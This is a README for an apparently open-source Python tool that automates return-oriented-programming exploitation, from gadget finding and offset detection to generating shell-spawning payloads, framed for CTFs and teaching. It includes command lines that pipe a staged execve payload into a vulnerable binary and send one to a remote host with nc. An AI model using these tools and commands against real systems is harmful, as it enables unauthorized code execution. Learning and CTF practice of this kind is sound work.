All-in-One ROP Exploitation Engine | CTF Weapon | Security Research Tool
ROF automatically analyzes binaries, finds gadgets, builds chains, and delivers working payloads in seconds.
ROF automates the entire ROP exploitation workflow β from binary analysis to working payload generation β in seconds. Designed for CTFs, security research, and hands-on binary exploitation learning.
No more hours of manual gadget hunting. Just run one command and get a shell.
git clone https://github.com/medaminkh-dev/Raw_Overflow_Forge.git
cd Raw_Overflow_Forge
python3 Raw_Overflow_Forge.py --create-testThis automatically:
- Creates a vulnerable test binary packed with useful gadgets
- Analyzes it
- Finds the correct offset
- Generates multiple working exploit payloads
- Gets you a shell!
Traditional ROP exploitation takes hours of repetitive work:
| Step | Manual Time | With ROF |
|---|---|---|
| Binary analysis | 20 mins | Automatic |
| Gadget extraction | 30 mins | 5 seconds |
| Chain construction | 45 mins | Automatic |
| Offset finding | 15 mins | Automatic |
| Payload testing | 20 mins | Instant |
| Total | ~2 hours | ~2 minutes |
ROF turns ROP from a tedious chore into a fast, repeatable weapon.
| Feature | Description | Benefit |
|---|---|---|
| Smart Binary Analysis | Auto-detects ELF/PE, arch, sections, entry point | No manual readelf/objdump |
| Multi-Method Gadget Finder | Pattern search + objdump parsing + Capstone engine | Maximum gadget coverage |
| Intelligent Categorization | Groups gadgets by function (pop rdi, syscall, etc.) | Easy chain building |
| Auto Offset Detection | Finds exact buffer overflow offset automatically | No more cyclic pattern guessing |
| Staged execve Payload | Full shell via read() + execve("/bin/sh") | Reliable shell on real targets |
| win() Exploitation | Detects and calls win() functions automatically | Instant flag in many CTFs |
| Test Binary Generator | Creates perfect ROP training environment | Learn without hunting targets |
| Multiple Payload Types | Simple ROP, win exploit, staged shell | Flexibility for any scenario |
python3 Raw_Overflow_Forge.py --create-testThis creates vuln_test β a binary deliberately full of useful gadgets β and shows you exactly how to exploit it.
Then get a shell:
(cat staged_execve.bin; echo -ne '/bin/sh\x00'; cat -) | ./vuln_test# Full automatic mode
python3 Raw_Overflow_Forge.py vulnerable_binary
# Force specific offset
python3 Raw_Overflow_Forge.py vulnerable_binary --offset 136
# Disable .bss usage (for NX-enabled targets)
python3 Raw_Overflow_Forge.py vulnerable_binary --no-bsspython3 Raw_Overflow_Forge.py challenge --offset 72 | nc ctf.example.com 1337[+] Analyzing binary: vuln_test
Type: ELF
Architecture: 64-bit
Entry point: 0x40111a
Base address: 0x400000
Size: 16,384 bytes
[+] Extracting gadgets...
[+] Extraction complete: 312 gadgets found
[+] Gadget statistics:
pop_rdi : 12
pop_rsi : 9
pop_rdx : 8
pop_rax : 10
syscall : 5
ret : 145
[+] Complete execve chain can be built!
[+] Payload saved: staged_execve.bin (248 bytes)
[+] Payload saved: simple_rop.bin (96 bytes)
ROF is designed to teach ROP, not hide it:
- Shows exact gadget addresses and disassembly
- Explains each step clearly
- Provides perfect training binary
- Demonstrates real exploitation techniques
Perfect for:
- CTF beginners learning ROP
- Security students
- Pentesters expanding into binary exploitation
- Researchers prototyping exploits
Raw_Overflow_Forge/
βββ Raw_Overflow_Forge.py # Main engine (pure Python)
βββ vuln_test.c # Source for test binary
βββ examples/ # Sample challenges
βββ staged_execve.bin # β Generated payloads
βββ win_exploit.bin
βββ simple_rop.bin
Dependencies: Only standard Python + optional Capstone (pip install capstone)
ROF is strictly for:
- β CTF competitions
- β Authorized security testing
- β Educational purposes
- β Security research
NOT for:
- β Unauthorized system access
- β Malicious activities
- β Attacking production systems
Use responsibly. Knowledge is power β wield it ethically.
Contributions welcome! Help make ROP more accessible:
- Report bugs
- Suggest new features
- Improve gadget detection
- Add Windows PE support
- Create more example challenges
MIT License β free to use, modify, and distribute.
If ROF helps you win a CTF, learn ROP, or level up your skills β give it a star!
python3 Raw_Overflow_Forge.py --create-testHappy Hacking! π΄ββ οΈ
ROF β Turning hours of ROP grinding into minutes of pure exploitation.